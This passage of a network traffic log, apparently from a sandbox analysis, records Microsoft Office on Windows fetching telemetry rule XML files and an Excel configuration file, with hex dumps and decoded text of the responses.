                                                                                                              x-azure-ref: 20241205T093840Z-1746fd949bdhk6hphC1EWRaw3c00000002bg000000001khg
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:41 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              66192.168.2.64979813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:40 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:41 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 407
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                              ETag: "0x8DC582B9D30478D"
                                                                                                              x-ms-request-id: 7057cc02-501e-008f-16cc-459054000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093840Z-1746fd949bdhk6hphC1EWRaw3c000000026g000000007vtz
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:41 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              67192.168.2.64979913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:40 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:41 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:40 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 469
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                              ETag: "0x8DC582BB3CAEBB8"
                                                                                                              x-ms-request-id: 38989359-101e-000b-1791-465e5c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093840Z-1746fd949bd54zxghC1EWRzre400000002u0000000003d5m
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:41 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              68192.168.2.64980113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:42 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:42 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:42 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 416
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                              x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093842Z-1746fd949bdlqd7fhC1EWR6vt000000002t0000000000wup
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              69192.168.2.64980313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:42 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:43 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 475
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                              ETag: "0x8DC582BBA740822"
                                                                                                              x-ms-request-id: 4879dc54-201e-0096-5ac3-45ace6000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093843Z-1746fd949bddtfvqhC1EWRxbpg00000002c0000000007q1u
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:43 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              70192.168.2.64980413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:42 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:43 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 432
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                              ETag: "0x8DC582BAABA2A10"
                                                                                                              x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093843Z-1746fd949bdb8xvchC1EWRmbd400000002h0000000001vp0
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:43 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              71192.168.2.64980213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:42 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:43 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 472
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                              x-ms-request-id: 26f79bf1-901e-0083-7ec4-45bb55000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093843Z-1746fd949bd6zq92hC1EWRry4800000002f0000000004xu1
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:43 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              72192.168.2.64980513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:42 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:43 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:43 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 427
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                              ETag: "0x8DC582BB464F255"
                                                                                                              x-ms-request-id: 1e2c2913-401e-0078-28cc-454d34000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093843Z-1746fd949bddgsvjhC1EWRum2c00000002w0000000001dxz
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:43 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              73192.168.2.64980813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:45 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:44 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 474
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                              ETag: "0x8DC582BA4037B0D"
                                                                                                              x-ms-request-id: 85a1d3f6-901e-005b-3ecd-452005000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093844Z-1746fd949bdzd2qvhC1EWRcygw0000000250000000008adz
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:45 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              74192.168.2.64981452.113.195.1324438172C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:44 UTC851OUTGET /config/v2/Office/excel/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7b218D754C-5ACC-4240-B93A-04A1640018AE%7d&Application=excel&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bC4ECCB6C-B7DD-41E0-BCD4-0D9602B18E10%7d&LabMachine=false HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              If-None-Match: "CLZpXYLcPto9RjiTXXMKLgZS7vJSi8dJL0Uz3IIB3+0="
                                                                                                              User-Agent: Microsoft Office 2014
                                                                                                              DisableExperiments: false
                                                                                                              X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
                                                                                                              Host: ecs.office.com
                                                                                                              2024-12-05 09:38:45 UTC847INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache,max-age=14400
                                                                                                              Content-Length: 151801
                                                                                                              Content-Type: application/json
                                                                                                              Expires: Thu, 05 Dec 2024 13:38:45 GMT
                                                                                                              ETag: "yqn65NjgXT26XZSuw8Pd5ED7jt1Qb/e0MYVM1voTDoQ="
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: DENY
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                              Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=Edge-Prod-BL2r8a&FrontEnd=AFD"}],"include_subdomains":true}
                                                                                                              NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              X-MSEdge-Ref: Ref A: 5E25FA486AC94189A3AF74EBEA5CDD69 Ref B: BL2AA2010203031 Ref C: 2024-12-05T09:38:45Z
                                                                                                              Date: Thu, 05 Dec 2024 09:38:44 GMT
                                                                                                              Connection: close
                                                                                                              2024-12-05 09:38:45 UTC3351INData Raw: 7b 22 45 43 53 22 3a 7b 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 63 37 32 65 61 32 38 37 2d 65 64 37 37 2d 34 66 61 36 2d 61 34 38 30 2d 33 37 31 32 34 30 36 63 33 36 37 65 22 3a 22 61 6b 61 2e 6d 73 2f 45 63 73 43 61 6e 61 72 79 22 2c 22 43 61 63 68 65 45 78 70 69 72 79 49 6e 4d 69 6e 22 3a 32 34 30 2c 22 45 6e 61 62 6c 65 53 6d 61 72 74 45 54 61 67 22 3a 31 2c 22 43 6f 6e 66 69 67 49 64 44 65 6c 69 6d 69 74 65 72 49 6e 4c 6f 67 22 3a 22 3b 22 7d 2c 22 4e 61 6e 63 79 4f 66 66 69 63 65 54 65 61 6d 22 3a 7b 22 7a 68 65 74 61 6e 34 31 32 32 30 32 31 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 41 63 63 65 73 73 22 3a 7b 22 55 73 65 46 6f 72 6d 54 68 65 6d 65 49 66 4e 6f 50 61 72 65 6e 74 53 65 63 74 69 6f 6e
                                                                                                              Data Ascii: {"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary","CacheExpiryInMin":240,"EnableSmartETag":1,"ConfigIdDelimiterInLog":";"},"NancyOfficeTeam":{"zhetan4122021":true},"Office_Access":{"UseFormThemeIfNoParentSection
                                                                                                              2024-12-05 09:38:45 UTC8192INData Raw: 7a 73 79 38 4b 5a 6a 75 53 41 49 79 56 2b 67 56 6f 59 77 42 4f 38 6a 55 74 68 6d 73 47 6b 75 70 64 4f 70 7a 53 41 42 77 75 36 42 4d 63 65 67 44 4e 75 71 50 50 6d 33 52 34 43 44 6f 30 75 65 6b 58 4e 46 4f 67 5a 6a 6a 55 69 6a 75 55 56 74 55 69 6d 50 30 50 6d 68 33 68 44 70 6b 4e 48 57 72 73 2f 6a 52 50 7a 2b 31 4c 30 4f 77 63 6c 59 53 76 6f 6a 36 76 72 72 6b 48 4a 6a 35 43 4a 57 45 35 38 2b 4d 38 48 62 62 62 41 4f 78 78 56 75 66 72 38 43 6b 4c 67 4b 6e 37 39 77 70 78 74 6c 6b 42 58 47 7a 73 45 2f 62 7a 61 38 6c 73 77 57 46 42 63 38 49 45 34 42 65 37 63 77 54 34 4f 59 51 48 64 6f 61 46 4a 45 68 78 72 70 76 37 68 54 69 4c 37 41 42 61 4d 75 6f 45 68 77 6f 68 62 4e 31 56 4b 38 51 70 31 61 32 64 4b 75 72 4d 74 34 5a 63 2b 6e 35 4b 44 75 30 76 4f 71 32 68 33 67
